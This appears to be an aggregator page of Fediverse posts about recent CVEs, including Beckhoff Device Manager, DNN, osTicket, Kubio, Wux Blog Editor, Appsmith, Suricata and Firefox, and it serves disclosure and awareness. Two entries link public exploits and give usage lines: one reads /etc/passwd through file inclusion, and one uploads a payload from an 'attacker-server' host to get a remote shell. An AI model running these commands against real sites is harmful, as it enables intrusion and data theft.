Overview
- Beckhoff Automation
- Beckhoff.Device.Manager.XAR
Description
Statistics
- 2 Posts
Fediverse
🟠 CVE-2025-41726 - High (8.8)
A low privileged remote attacker can execute arbitrary code by sending specially crafted calls to the web service of the Device Manager or locally via an API and can cause integer overflows which then may lead to arbitrary code execution within pr...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2025-41726/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
#OT #Advisory VDE-2025-092
Beckhoff: Privilege escalation and information leak via Beckhoff Device Manager
The vulnerability CVE-2025-41726 (NN-2025-0074) allows an authenticated remote user to execute arbitrary commands on the device. This can be exploited over the web UI or via API. In one case the execution of the arbitrary command happens within a privileged process.
#CVE CVE-2025-41726, CVE-2025-41727, CVE-2025-41728
https://certvde.com/en/advisories/vde-2025-092/
#CSAF https://beckhoff.csaf-tp.certvde.com/.well-known/csaf/white/2026/vde-2025-092.json
Overview
- Beckhoff Automation
- Beckhoff.Device.Manager.XAR
Description
Statistics
- 2 Posts
Fediverse
🟠 CVE-2025-41727 - High (7.8)
A local low privileged attacker can bypass the authentication of the Device Manager user interface, allowing them to perform privileged operations and gain administrator access.
🔗 https://www.thehackerwire.com/vulnerability/CVE-2025-41727/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
#OT #Advisory VDE-2025-092
Beckhoff: Privilege escalation and information leak via Beckhoff Device Manager
The vulnerability CVE-2025-41726 (NN-2025-0074) allows an authenticated remote user to execute arbitrary commands on the device. This can be exploited over the web UI or via API. In one case the execution of the arbitrary command happens within a privileged process.
#CVE CVE-2025-41726, CVE-2025-41727, CVE-2025-41728
https://certvde.com/en/advisories/vde-2025-092/
#CSAF https://beckhoff.csaf-tp.certvde.com/.well-known/csaf/white/2026/vde-2025-092.json
Overview
Description
Statistics
- 2 Posts
- 4 Interactions
Overview
- dnnsoftware
- Dnn.Platform
Description
Statistics
- 1 Post
- 1 Interaction
Fediverse
🟠 CVE-2026-24837 - High (7.6)
DNN (formerly DotNetNuke) is an open-source web content management platform (CMS) in the Microsoft ecosystem. Starting in version 9.0.0 and prior to versions 9.13.10 and 10.2.0, a module friendly name could include scripts that will run during som...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-24837/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
Overview
- Enhancesoft
- osTicket
Description
Statistics
- 1 Post
- 2 Interactions
Fediverse
Die Detektion offen aus dem Internet erreichbarer osTicket-Systeme konnte verbessert werden. Damit sind uns aktuell rund 1.700 Systeme bei deutschen Netzbetreibern bekannt.
Davon laufen 22% mit der aktuellen Version 1.17.7 oder 1.18.3, welche die Schwachstelle CVE-2026-22200 schließt.
50% laufen mit veralteten Versionen 1.17.x bzw. 1.18.x.
28% laufen mit Versionen 1.9 bis 1.16, die nicht mehr vom Hersteller unterstützt werden.
Overview
- extendthemes
- Kubio AI Page Builder
Description
Statistics
- 1 Post
- 1 Interaction
Fediverse
‼️ CVE-2025-2294: Kubio AI Page Builder <= 2.5.1 - Unauthenticated Local File Inclusion
GitHub: https://github.com/fumioryoto/CVE-2025-2294-Kubio-2.5.1-LFi-Checker
CVSS: 9.8
Usage:
usage: exploit.py [-h] -u URL [-f FILE]
options:
-h, --help show this help message and exit
-u URL, --url URL Target base URL (e.g., https://example.com)
-f FILE, --file FILE File to read (default: /etc/passwd)
Example:
python3 exploit.py -u https://example.com -f /etc/passwd
Overview
- jurredeklijn
- Wux Blog Editor
Description
Statistics
- 1 Post
- 1 Interaction
Fediverse
‼️ CVE-2024-9932: An unauthenticated arbitrary file upload vulnerability in the Wux Blog Editor WordPress plugin, leading to remote command execution (RCE).
GitHub: https://github.com/JoshuaProvoste/0-click-RCE-Exploit-for-CVE-2024-9932
Type: 0-Click RCE Exploit
Usage: python CVE-2024-9932.py --target http://target-wordpress-site --payload http://attacker-server/cmd.php --payload_name cmd.php
After execution, the script uploads the payload, confirms its accessibility, detects the OS, and drops into an interactive shell.
Overview
- appsmithorg
- appsmith
Description
Statistics
- 1 Post
- 1 Interaction
Fediverse
‼️ CVE-2026-22794: Appsmith Password Reset Account Takeover via Origin Header Injection
GitHub: https://github.com/MalikHamza7/CVE-2026-22794-POC
CVSS: 9.6
Overview
Description
Statistics
- 1 Post
Fediverse
🟠 CVE-2026-22259 - High (7.5)
Suricata is a network IDS, IPS and NSM engine. Prior to versions 8.0.3 and 7.0.14, specially crafted traffic can cause Suricata to consume large amounts of memory while parsing DNP3 traffic. This can lead to the process slowing down and running ou...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-22259/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
Overview
Description
Statistics
- 1 Post
Fediverse
🟠 CVE-2026-24869 - High (8.1)
Use-after-free in the Layout: Scrolling and Overflow component. This vulnerability affects Firefox < 147.0.2.
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-24869/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack